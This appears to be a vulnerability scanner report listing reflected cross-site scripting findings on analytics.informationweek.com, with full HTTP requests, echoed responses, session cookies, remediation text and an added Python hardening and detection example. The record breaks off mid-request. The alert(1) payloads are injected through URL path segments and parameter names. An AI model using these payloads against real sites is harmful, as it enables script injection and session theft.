GET /menu/13/Outsourcing-and-services9e007--><script>alert(1)</script>d20170e2eff/Outsourcing-services.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:55 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:55 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... vices9e007--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed20170e2eff%2FOutsourcing-services.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/13/Outsourcing-and-services9e007--><script>alert(1)</script>d20170e2eff/Outsourcing-services.html"> ...[SNIP]...
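The pattern behind every finding in this section is the same: a value taken from the request URL (a path segment or the name of a query parameter) is written into an HTML comment without encoding, and the leading --> of the payload closes the comment so that the <script> element after it is parsed as live markup. The following Python is an added example, not code from the scanned site or from the scanner. It assumes a hypothetical 404 handler that records the raw request URI in a comment, places the hardened rendering beside it, and adds two checks a reviewer can reuse: a validator for the HTML comment-data rules and a detector for script tags left outside any comment. PAYLOAD and REQUEST_URI are copied from the first finding above; everything else is constructed for the example.

```python
import html
import re

# Taken from the first finding above: the payload submitted in REST URL
# parameter 3 and the full request path it was embedded in.
PAYLOAD = "9e007--><script>alert(1)</script>d20170e2eff"
REQUEST_URI = "/menu/13/Outsourcing-and-services" + PAYLOAD + "/Outsourcing-services.html"


def render_vulnerable(request_uri):
    """Hypothetical 404 handler (assumed, not the site's code): it records the
    raw request URI inside an HTML comment, so '-->' in the URI closes the
    comment and whatever follows is parsed as markup."""
    return "<!-- requested: " + request_uri + " -->\n<p>Page not found</p>\n"


def encode_for_comment(value):
    """HTML-escape the value before it enters comment data.  '>' becomes
    '&gt;', so neither '-->' nor '--!>' can terminate the comment; '--' is
    also broken up because XML (and so the XHTML doctype this page declares)
    does not allow it inside a comment."""
    return html.escape(value, quote=True).replace("--", "- -")


def render_hardened(request_uri):
    """Same page as render_vulnerable, with the value encoded first."""
    return "<!-- requested: " + encode_for_comment(request_uri) + " -->\n<p>Page not found</p>\n"


def safe_for_comment(text):
    """Validate text against the HTML comment-data rules: it must not start
    with '>' or '->', must not end with '<!-', and must not contain '<!--',
    '-->' or '--!>'.  Anything that fails can close or nest a comment."""
    if text.startswith((">", "->")) or text.endswith("<!-"):
        return False
    return not any(token in text for token in ("<!--", "-->", "--!>"))


def live_script(body):
    """Detection check on a response body: remove well-formed comments (which
    a browser treats as inert) and report whether a <script> tag remains in
    the live markup."""
    outside = re.sub(r"<!--.*?(?:-->|--!>)", "", body, flags=re.S)
    return re.search(r"<script\b", outside, flags=re.I) is not None


def echoed_unmodified(body, payload):
    """The scanner's own criterion: the payload appears in the body byte for
    byte."""
    return payload in body


if __name__ == "__main__":
    for name, page in (("vulnerable", render_vulnerable(REQUEST_URI)),
                       ("hardened", render_hardened(REQUEST_URI))):
        print(name, "echoed unmodified:", echoed_unmodified(page, PAYLOAD),
              "live script:", live_script(page))
```

Escaping addresses only the comment context. The response snippets in these findings also show the same value ending a quoted URL in a successfulLoginRedirect parameter, so a complete fix encodes each copy for the context it lands in (URL-encoding inside the query string, attribute encoding inside the attribute) and, better still, stops writing request data into comments on error pages at all.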
The value of REST URL parameter 4 is copied into an HTML comment. The payload bade7--><script>alert(1)</script>a6b7121472a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/13/Outsourcing-and-services/Outsourcing-services.htmlbade7--><script>alert(1)</script>a6b7121472a HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:50:37 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:50:37 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... es.htmlbade7--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ea6b7121472a&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/13/Outsourcing-and-services/Outsourcing-services.htmlbade7--><script>alert(1)</script>a6b7121472a"> ...[SNIP]...
3.70. http://analytics.informationweek.com/menu/13/Outsourcing-and-services/Outsourcing-services.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 6d1b3--><script>alert(1)</script>ffaca7e1bef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/13/Outsourcing-and-services/Outsourcing-services.html?6d1b3--><script>alert(1)</script>ffaca7e1bef=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 3F6d1b3--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Effaca7e1bef%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/13/Outsourcing-and-services/Outsourcing-services.html?6d1b3--><script>alert(1)</script>ffaca7e1bef=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 3497a--><script>alert(1)</script>b14e7e078f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu3497a--><script>alert(1)</script>b14e7e078f4/14/Regulatory-compliance/Regulatory-compliance.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:14 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45951
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... enu3497a--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb14e7e078f4%2F14%2FRegulatory-compliance%2FRegulatory-compliance.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu3497a--><script>alert(1)</script>b14e7e078f4/14/Regulatory-compliance/Regulatory-compliance.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 8f0a9--><script>alert(1)</script>e0ead1f783e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/148f0a9--><script>alert(1)</script>e0ead1f783e/Regulatory-compliance/Regulatory-compliance.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:29 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:31 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45951
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... %2F148f0a9--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee0ead1f783e%2FRegulatory-compliance%2FRegulatory-compliance.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/148f0a9--><script>alert(1)</script>e0ead1f783e/Regulatory-compliance/Regulatory-compliance.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 99475--><script>alert(1)</script>1d835a1e36b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/14/Regulatory-compliance99475--><script>alert(1)</script>1d835a1e36b/Regulatory-compliance.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:42 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:42 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45951
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... pliance99475--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E1d835a1e36b%2FRegulatory-compliance.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/14/Regulatory-compliance99475--><script>alert(1)</script>1d835a1e36b/Regulatory-compliance.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload d29e4--><script>alert(1)</script>8dfe7f79a8e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/14/Regulatory-compliance/Regulatory-compliance.htmld29e4--><script>alert(1)</script>8dfe7f79a8e HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:51 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:51 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45951
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ance.htmld29e4--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E8dfe7f79a8e&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/14/Regulatory-compliance/Regulatory-compliance.htmld29e4--><script>alert(1)</script>8dfe7f79a8e"> ...[SNIP]...
3.75. http://analytics.informationweek.com/menu/14/Regulatory-compliance/Regulatory-compliance.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload cb493--><script>alert(1)</script>3a29ce36218 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/14/Regulatory-compliance/Regulatory-compliance.html?cb493--><script>alert(1)</script>3a29ce36218=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... l%3Fcb493--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E3a29ce36218%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/14/Regulatory-compliance/Regulatory-compliance.html?cb493--><script>alert(1)</script>3a29ce36218=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 3b017--><script>alert(1)</script>b342dbc4ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu3b017--><script>alert(1)</script>b342dbc4ff/15/Risk-management/Risk-management.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:16 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:16 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45925
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... nweek.com%2Fmenu3b017--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb342dbc4ff%2F15%2FRisk-management%2FRisk-management.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu3b017--><script>alert(1)</script>b342dbc4ff/15/Risk-management/Risk-management.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 68690--><script>alert(1)</script>5ec01a42a8e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/1568690--><script>alert(1)</script>5ec01a42a8e/Risk-management/Risk-management.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:29 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:29 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45927
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... k.com%2Fmenu%2F1568690--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E5ec01a42a8e%2FRisk-management%2FRisk-management.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/1568690--><script>alert(1)</script>5ec01a42a8e/Risk-management/Risk-management.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload f21aa--><script>alert(1)</script>0b84347c146 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/15/Risk-managementf21aa--><script>alert(1)</script>0b84347c146/Risk-management.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:38 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:38 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45927
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 5%2FRisk-managementf21aa--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E0b84347c146%2FRisk-management.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/15/Risk-managementf21aa--><script>alert(1)</script>0b84347c146/Risk-management.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 379d3--><script>alert(1)</script>d2d0dc344c3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/15/Risk-management/Risk-management.html379d3--><script>alert(1)</script>d2d0dc344c3 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:49 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:49 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45927
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... FRisk-management.html379d3--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed2d0dc344c3&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/15/Risk-management/Risk-management.html379d3--><script>alert(1)</script>d2d0dc344c3"> ...[SNIP]...
3.80. http://analytics.informationweek.com/menu/15/Risk-management/Risk-management.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://analytics.informationweek.com
Path:
/menu/15/Risk-management/Risk-management.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a2d82--><script>alert(1)</script>67632b3f5b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/15/Risk-management/Risk-management.html?a2d82--><script>alert(1)</script>67632b3f5b1=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... nagement.html%3Fa2d82--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E67632b3f5b1%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/15/Risk-management/Risk-management.html?a2d82--><script>alert(1)</script>67632b3f5b1=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload a149b--><script>alert(1)</script>3766ebdc316 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menua149b--><script>alert(1)</script>3766ebdc316/18/Mobile-and-wireless/Mobile-wireless.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
